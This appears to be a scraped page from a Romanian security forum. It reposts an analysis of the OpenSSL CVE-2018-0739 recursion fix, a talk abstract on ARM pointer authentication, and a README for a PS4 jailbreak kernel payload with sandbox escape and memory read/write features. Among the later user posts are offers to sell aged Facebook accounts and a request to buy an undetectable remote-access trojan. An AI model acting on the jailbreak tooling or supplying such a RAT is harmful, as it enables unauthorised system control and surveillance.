  15. CVE-2018-0739: OpenSSL ASN.1 stack overflow This was a vulnerability discovered by Google’s OSS-Fuzz project and it was fixed by Matt Caswell of the OpenSSL development team. The vulnerability affects OpenSSL releases prior to 1.0.2o and 1.1.0h and based on OpenSSL team’s assessment, this cannot be triggered via SSL/TLS but constructed ASN.1 types with support for recursive definitions, such as PKCS7 can be used to trigger it. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 /* * Decode an item, taking care of IMPLICIT tagging, if any. If 'opt' set and * tag mismatch return -1 to handle OPTIONAL */ static int asn1_item_embed_d2i(ASN1_VALUE **pval, const unsigned char **in, long len, const ASN1_ITEM *it, int tag, int aclass, char opt, ASN1_TLC *ctx) { const ASN1_TEMPLATE *tt, *errtt = NULL; const ASN1_EXTERN_FUNCS *ef; const ASN1_AUX *aux = it->funcs; ASN1_aux_cb *asn1_cb; const unsigned char *p = NULL, *q; unsigned char oclass; char seq_eoc, seq_nolen, cst, isopt; long tmplen; int i; int otag; int ret = 0; ASN1_VALUE **pchptr; if (!pval) return 0; if (aux &amp;&amp; aux->asn1_cb) asn1_cb = aux->asn1_cb; else asn1_cb = 0; switch (it->itype) { ... return 0; } What you see above is a snippet of crypto/asn1/tasn_dec.c where the decoding ASN.1 function asn1_item_embed_d2i() is located. Neither this function nor any of its callers had any check for recursive definitions. This means that given a malicious PKCS7 file this decoding routine will keep on trying to decode them until the process will run out of stack space. To fix this, a new error case was added in crypto/asn1/asn1.h header file named ASN1_R_NESTED_TOO_DEEP. If we have a look at crypto/asn1/asn1_err.c we can see that the new error code is equivalent to the “nested too deep” error message. 1 2 3 {ERR_REASON(ASN1_R_NESTED_ASN1_STRING), "nested asn1 string"}, + {ERR_REASON(ASN1_R_NESTED_TOO_DEEP), "nested too deep"}, {ERR_REASON(ASN1_R_NON_HEX_CHARACTERS), "non hex characters"}, Similarly, a new constant (ASN1_MAX_CONSTRUCTED_NEST) definition was added which is used to define the maximum amount of recursive invocations of asn1_item_embed_d2i() function. You can see the new definition in crypto/asn1/tasn_dec.c. 1 2 3 4 5 6 7 8 9 10 11 #include <openssl/err.h> /* * Constructed types with a recursive definition (such as can be found in PKCS7) * could eventually exceed the stack given malicious input with excessive * recursion. Therefore we limit the stack depth. This is the maximum number of * recursive invocations of asn1_item_embed_d2i(). */ #define ASN1_MAX_CONSTRUCTED_NEST 30 static int asn1_check_eoc(const unsigned char **in, long len); Lastly, the asn1_item_embed_d2i() function itself was modified to have a new integer argument “depth” which is used as a counter for each iteration. You can see how check is performed before entering the switch clause here. 1 2 3 4 5 6 7 8 9 asn1_cb = 0; if (++depth > ASN1_MAX_CONSTRUCTED_NEST) { ASN1err(ASN1_F_ASN1_ITEM_EMBED_D2I, ASN1_R_NESTED_TOO_DEEP); goto err; } switch (it->itype) { case ASN1_ITYPE_PRIMITIVE: Similarly, all calling functions on OpenSSL have been updated to ensure that the new argument is used as intended. The official security advisory describes the above vulnerability like this. Constructed ASN.1 types with a recursive definition could exceed the stack (CVE-2018-0739) ========================================================================================== Severity: Moderate Constructed ASN.1 types with a recursive definition (such as can be found in PKCS7) could eventually exceed the stack given malicious input with excessive recursion. This could result in a Denial Of Service attack. There are no such structures used within SSL/TLS that come from untrusted sources so this is considered safe. OpenSSL 1.1.0 users should upgrade to 1.1.0h OpenSSL 1.0.2 users should upgrade to 1.0.2o This issue was reported to OpenSSL on 4th January 2018 by the OSS-fuzz project. The fix was developed by Matt Caswell of the OpenSSL development team. Sursa: https://xorl.wordpress.com/2018/03/30/cve-2018-0739-openssl-asn-1-stack-overflow/
    1 point
  16. Microsoft Security Response Center (MSRC) Publicat pe 14 feb. 2018 ABONEAZĂ-TE 287 Rob Turner, Qualcomm Technologies Almost three decades since the Morris worm and we're still plagued by memory corruption vulnerabilities in C and C++ software. Exploit mitigations aim to make the exploitation of these vulnerabilities impossible or prohibitively expensive. However, modern exploits demonstrate that currently deployed countermeasures are insufficient. In ARMv8.3, ARM introduces a new hardware security feature, pointer authentication. With ARM and ARM partners, including Microsoft, we helped to design this feature. Designing a processor extension is challenging. Among other requirements, changes should be transparent to developers (except compiler developers), support both system and application code, interoperate with legacy software, and provide binary backward compatibility. This talk discusses the processor extension and explores the design trade-offs, such as the decision to prefer authentication over encryption and the consequences of small tags. Also, this talk provides a security analysis, and examines how these new instructions can robustly and efficiently implement countermeasures. Presentation Slide Deck: https://www.slideshare.net/MSbluehat/...
    1 point
  17. Jailbreak Kernel Patches Features Jailbreak Sandbox escape Debug settings Enable UART Disable system update messages Delete system updates Fake self support Fake pkg support RPC server RPC client in C# I use the standard fake pkg keys, created by flatz. General Notes Only for 4.55 Jailbroken PlayStation 4 consoles! The main jkpatch payload utilizes a port of CTurt's payload sdk. Change the Makefile to have LIBPS4 point to the ps4-payload-sdk directory on your machine. I could have it referenced from the home directory but meh... # change this to point to your ps4-payload-sdk directory LIBPS4 := /home/John/ps4-payload-sdk/libPS4 If you decide to edit the resolve code in the kernel payload, make sure you do not mess with... void resolve(uint64_t kernbase); ... as it is called from crt0.s. And changing this will produce errors. See other branches for other kernel support. I will support latest publically exploited firmware on main branch. RPC Quickstart See either Example.cs or look at the RPC documentation. You can read/write memory, call functions, read/write kernel memory, and even load elfs. Here is a cool example of an elf loaded into COD Ghosts (forge mod made by me!) You can download the source code to the forge mod here. Have fun! Coming Soon General code clean up and refactoring Thank you to flatz, idc, zecoxao, hitodama, osdev.org, and anyone else I forgot! Twitter: @cloverleafswag3 psxhax: g991 golden <3 Sursa: https://github.com/xemio/jkpatch
    1 point
  18. PLus ca mai un user spider care da dislike la orice aproape( ba poate postez eu ce nu il intereseaza, dar frate sari peste iti vezi de treaba ta, dintr un dislike primit de la unu ca el se poate ajunge la multe, in fine cert e ca nu un dislike desemnează persoana).
    1 point
  19. Lol... Nu te poti astepta de la nimic,insa iti pot confirma ca am facut multe tranzactii pe acest forum si nu am tras nici-o teapa ! Sunt baiat corect,nu banii ma fac pe mine, omenia conteaza. Daca am -16 asta nu inseamna ca am tras teapa,asta inseamna ca sunt baieti ca tine care dau reputatie - din orice !
    1 point
  20. Am 2 conturi de vanzare 5000 prieteni vechi de mai mult de 8 luni
    1 point
  21. Lol,la 0,50$ nici in romana nu as scrie pe un articol de maxim 100 cuvinte
    1 point
  22. Nu vreau sa fac reclama, sau sa stric treburile tale dar pe fiverr se vand mult mult mai iefitn si sunt si verificare cu nr de telefon si toate cele, iar si eu vand conturi de facebook gen peste 2-3-4 luni vechime, cu nr de telefon adaugat, adaugate in peste 50 de grupuri si cel mai mic grup are 15-16 mii de oameni, iar in toate grupurile se posteaza automat fara aprobari... si le vand mult mai iefitn decat spui tu aici, si da sunt 100% de romania, daca a scapat vreun pakistanez sau vreu indian e partea doua
    1 point
  23. @thatsmyname : 200848877.rar
    1 point
  24. Pm cu mai multe detalii
    -1 points
  25. Salut am nevoie de cineva cu un RAT bun, sa fie ușor de folosit și nedetectabil. Sunt dispus să-l cumpăr sau sa plătesc pt un job interesant. Dacă este cineva care controlează forate bine chestia asta și ai plac provocările scrie-mi te rog.
    -1 points
×
×
  • Create New...